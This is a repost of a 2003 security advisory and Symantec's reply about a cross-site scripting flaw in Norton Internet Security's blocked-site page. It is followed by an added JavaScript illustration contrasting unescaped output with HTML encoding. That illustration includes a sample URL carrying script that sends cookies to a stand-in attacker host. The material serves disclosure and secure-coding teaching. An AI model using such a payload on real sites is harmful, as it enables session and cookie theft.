Re: Norton Internet Security Blocked Sites XSS

From: Sym Security (symsecurity_at_SYMANTEC.COM)
Date: 10/28/03

  • Next message: Free, Bob: "Re: Unannounced revisions to MS patches"
    Date:         Tue, 28 Oct 2003 13:25:24 -0600

    On 10/27/2003 01:27 PM, DigitalPranksters posted the following to

    DigitalPranksters Security Advisory

    Norton Internet Security Blocked Sites XSS

    Risk: Low

    Product: Norton Internet Security 2003 v6.0.4.34 (maybe others; we only
    tested this version)

    Product URL:

    Found By: KrazySnake -

    When Norton Internet Security 2003 blocks a web site, it returns a web
    page to the browser stating that the site has been blocked. This error
    message contains the URL which was requested. Norton Internet Security
    2003 appears to do no validation or encoding of the URL before returning
    it in the error message. This allows an attacker to supply a URL that
    contains script. This script will run in the context of the blocked site.

    We have marked this as a low risk because we believe in most situations,
    there will be little information of interest since the site is normally
    blocked (browser cookies from the blocked site probably do not exist,
    etc). However this does allow sites that are blocked to run script on the
    victim's machine when it shouldn't be allowed.

    Symantec Security Advisory
    27 October 2003
    Symantec Network Internet Security (NIS) Blocked Site Return Messages Not
    Properly Validated
    A security group, The Digital Pranksters, reported an issue they
    discovered in Symantec's Norton Internet Security product.
    The URL in the return message from a site on the blocked list in the
    Norton Parental Control feature can allow an unauthorized
    script to run on the client system.

    Components Affected
    Symantec's Norton Internet Security 2003
    Symantec's Norton Internet Security 2004

    Symantec's Norton Internet Security blocks inappropriate web content to
    help parents keep their children safe from
    inappropriate material while online. The Norton Parental Control blocks
    access to newsgroups and Web sites that may not be
    suitable for children. When a link is accessed or followed to one of the
    sites on the blocked list, Norton Internet Security
    returns a message stating that the site is restricted and has been
    blocked. The returned message includes the URL of the
    restricted site and is presented in a separate browser window Norton
    Internet Security opens on the client system. Digital
    Pranksters reported that they were able to supply a URL from a blocked
    site that contained additional unauthorized script
    embedded in the URL. This script displayed in the blocked access message
    window on the client system.

    Symantec Response
    Symantec has verified this issue. There is a bug in the way Norton
    Internet Security is validating the content it returns in
    the informational page. This is being fixed and will be forthcoming in a
    future LiveUpdate to Norton Internet Security
    The risk presented by this bug is very low to non-existent. Any
    unauthorized script returned in the blocked site URL runs in
    the context of the informational window that Norton Internet Security
    opens on the client system. This is a very restricted
    environment providing no access to the client system outside of the
    display window or any unauthorized information from the
    client system to be sent out. While it presents little risk to the client
    system, it is unwarranted action that is being
    Symantec takes any potential security issues with Symantec products very
    seriously. While the issue described by the Digital
    Pranksters applies only to the subset of Web sites contained in the Norton
    Internet Security Block Site list, there are many
    other malicious Web sites on the Internet and many ways of enticing a
    careless surfer to visit such a site. Symantec recommends
    the following best practices as part of a normal security posture:

    * Keep vendor-supplied security patches and updates for all application
    software and operating systems current.
    * Run current Anti-Virus/Firewall applications and keep the definitions
    updated. Systems should be scanned on a regular basis.
    * Be wary of attachments delivered via email, especially ones with .vbs,
    .bat, .exe, .pif and .scr file extensions that are
    commonly used to spread viruses, worms, and trojans.
    * Even if the sender is known, users should be wary of attachments or
    unknown files if the sender does not thoroughly explain
    the content in the body of the email. The source of the original
    attachment is often unknown.
    * If in doubt, users should contact the sender before opening the
    attachment or downloading the file to see if, in fact, they
    did intend to send it. If there is still doubt, users should delete the
    document in question without opening it.
    * If you intend to download an attachment, download to a separate folder
    and scan prior to opening.
    * Practice safe surfing.

    Symantec takes the security and proper functionality of our products very
    seriously. Symantec appreciates the coordination of
    Digital Pranksters security team in identifying and providing details of
    this area of concern as well as working closely with
    Symantec to properly address the issue. Anyone with information on
    security issues or concerns with Symantec products should

    Copyright (c) 2003 by Symantec Corp.
    Permission to redistribute this alert electronically is granted as long as
    it is not edited in any way unless authorized by
    Symantec Security Response. Reprinting the whole or parts of this alert in
    any medium other than electronically requires
    permission from
    The information in the advisory is believed to be accurate at the time of
    publishing based on currently available information.
    Use of the information constitutes acceptance for use in an AS IS
    condition. There are no warranties with regard to this
    information. Neither the author nor the publisher accepts any liability
    for any direct, indirect, or consequential loss or
    damage arising from use of, or reliance on, this information.
    Symantec, Symantec products, Symantec Security Response, and SymSecurity
    are registered trademarks of Symantec Corp. and/or
    affiliated companies in the United States and other countries. All other
    registered and unregistered trademarks represented in
    this document are the sole property of their respective companies/owners.

    Symantec Security Response
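The reflected-URL bug both messages describe, shown as an added example (this is not code from DigitalPranksters, Symantec or the Norton Internet Security product): a toy block-page generator that echoes the requested URL into its HTML unencoded, beside one that HTML-encodes it first. The page template, the function names, the `containsLiveScript` check and the two sample URLs are assumptions made for the illustration; neither message shows the product's real template or the payload that was actually used.

```javascript
// Added example, not code from Symantec or DigitalPranksters: a minimal model
// of a content filter that answers a blocked request with an HTML "site
// blocked" page that echoes the requested URL, as the advisory describes.

// Constructed sample requests (assumed for this example): a benign blocked
// URL and one that carries script in its query string.
const BENIGN_URL = "http://blocked.example/page?id=42";
const ATTACK_URL =
  'http://blocked.example/?q=<script>document.location="http://evil.example/?c="+document.cookie</script>';

// Vulnerable version: the URL is interpolated into the page with no encoding,
// so a <script> element inside the URL becomes live markup once the browser
// renders the informational page.
function blockPageVulnerable(url) {
  return (
    "<html><body><h1>Site blocked</h1><p>Access to " +
    url +
    " was blocked by Parental Control.</p></body></html>"
  );
}

// Entity-encode the five characters that matter in an HTML text node or a
// quoted attribute value. '&' must be replaced first so the other
// replacements are not double-encoded.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hardened version: the URL is encoded for the HTML text context it lands in,
// so "<script>" arrives in the browser as the literal text &lt;script&gt;.
function blockPageSafe(url) {
  return (
    "<html><body><h1>Site blocked</h1><p>Access to " +
    escapeHtml(url) +
    " was blocked by Parental Control.</p></body></html>"
  );
}

// Smoke test for a generated page: does a raw <script start tag survive in
// the output? (Hypothetical helper for this example, not a general XSS
// detector; it only catches this one element.)
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Stand-alone demonstration.
console.log("vulnerable page has live script:", containsLiveScript(blockPageVulnerable(ATTACK_URL)));
console.log("hardened page has live script:  ", containsLiveScript(blockPageSafe(ATTACK_URL)));
```

The encoding in `blockPageSafe` is the fix for the text-node context used here; a URL reflected into an attribute (for example a "go back" link) or into an inline script block needs the encoder for that context instead, and a regex check like `containsLiveScript` is only a sanity test, not a substitute for encoding every reflected value.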

